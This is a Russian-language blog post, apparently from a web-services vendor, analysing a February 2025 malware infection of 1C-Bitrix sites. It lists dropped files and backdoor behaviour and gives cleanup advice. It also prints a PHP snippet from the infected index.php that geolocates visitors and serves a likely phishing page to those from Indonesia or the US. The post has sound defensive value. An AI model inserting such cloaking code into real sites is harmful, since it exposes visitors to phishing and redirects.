Февральский вирус на Битрикс
Заказать усугу
В начале февраля 2025 года в сети распространился вирус, поражающий сайты на платформе 1С-Битрикс. Это вредоносное ПО встраивается в файлы проекта, создаёт дополнительные директории и выполняет подозрительные действия, включая сбор информации о пользователях и редиректы на внешние ресурсы. Однако, признаки его активности указывают на модификацию существующих атакующих методик, а не на совершенно новый вид угрозы.
- Получает IP-адрес пользователя.
- Делает запрос к сервису `ip-api.com`, чтобы определить страну.
- Если пользователь из **Индонезии или США**, подключает файл `readme.html`, который может содержать фишинговую страницу или редирект.
Пример вредоносного кода:
- Создание скрытых backdoor-скриптов.
- Запуск удалённых команд через `eval()` или `base64_decode()`.
- Подключение к внешним серверам для передачи данных.
- Может использоваться для загрузки новых вредоносных скриптов.
- Чаще всего содержит зашифрованный или обфусцированный код.
- **Кража данных пользователей** (IP, браузер, геолокация).
- **Использование сервера для атак** (спам, DDoS, размещение фишинговых страниц).
- Проверить корневой `index.php` на наличие вредоносного кода.
- Настроить `.htaccess` для защиты от загрузки исполняемых файлов.
Основные признаки заражения
Создание новых файлов и директорий:
- В папке `/aspro_regions/robots/` появляются неизвестные файлы.
- В корне сайта добавляются файлы `robots.connections.php`, `wp-ver.php`, `index.php`.
- Появляются каталоги с случайными именами, например, `1a869/`, `a410f/`, содержащие подменённые `index.php`.
Изменение главного
- В файл встраивается вредоносный код перед подключением `header.php`.
- Код использует обфускацию (`base64_encode`, `goto`), что затрудняет его обнаружение.
Разбор заражённых файлов
1. `index.php`
Файл содержит скрытый код, который выполняет следующие действия:- Получает IP-адрес пользователя.
- Делает запрос к сервису `ip-api.com`, чтобы определить страну.
- Если пользователь из **Индонезии или США**, подключает файл `readme.html`, который может содержать фишинговую страницу или редирект.
Пример вредоносного кода:
php
$ip = getUserIP();
$api_url = "http://ip-api.com/json/{$ip}";
$response = file_get_contents($api_url);
$data = json_decode($response, true);
if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {
ob_start();
include "readme.html";
$output = ob_get_clean();
echo $output;
die;
}
`
2. `wp-ver.php`
Этот файл маскируется под систему WordPress (`wp-` в названии), но на самом деле выполняет:- Создание скрытых backdoor-скриптов.
- Запуск удалённых команд через `eval()` или `base64_decode()`.
- Подключение к внешним серверам для передачи данных.
3. `robots.connections.php`
- Этот файл управляет связью с внешними серверами.- Может использоваться для загрузки новых вредоносных скриптов.
- Чаще всего содержит зашифрованный или обфусцированный код.
Цель вируса
- **Перехват трафика** (редиректы на фишинговые сайты).- **Кража данных пользователей** (IP, браузер, геолокация).
- **Использование сервера для атак** (спам, DDoS, размещение фишинговых страниц).
Как защититься?
1. Проверить файлы и директории
- Удалить `robots.connections.php`, `wp-ver.php`, неизвестные `index.php`.- Проверить корневой `index.php` на наличие вредоносного кода.
2. Обновить CMS и модули
- Убедитесь, что используете актуальную версию Битрикс.3. Ограничить доступ к серверу
- Запретить выполнение `eval()` в PHP-конфигурации.- Настроить `.htaccess` для защиты от загрузки исполняемых файлов.
4. Проверить права доступа
- Запрещённая запись в `/bitrix/`, `/local/` и `/upload/`.5. Провести антивирусную проверку
- Использовать `AI-Bolit`, `Virusdie`, `ClamAV` для сканирования файлов.Заключение
Этот вирус — серьёзная угроза для сайтов на Битрикс. Важно регулярно проверять файлы, следить за обновлениями и использовать защитные механизмы. Если ваш сайт заражён, рекомендуется немедленно удалить вредоносные файлы, провести аудит безопасности и усилить защиту.9 февраля 2025 (Boudybuilder) Виталий Фантич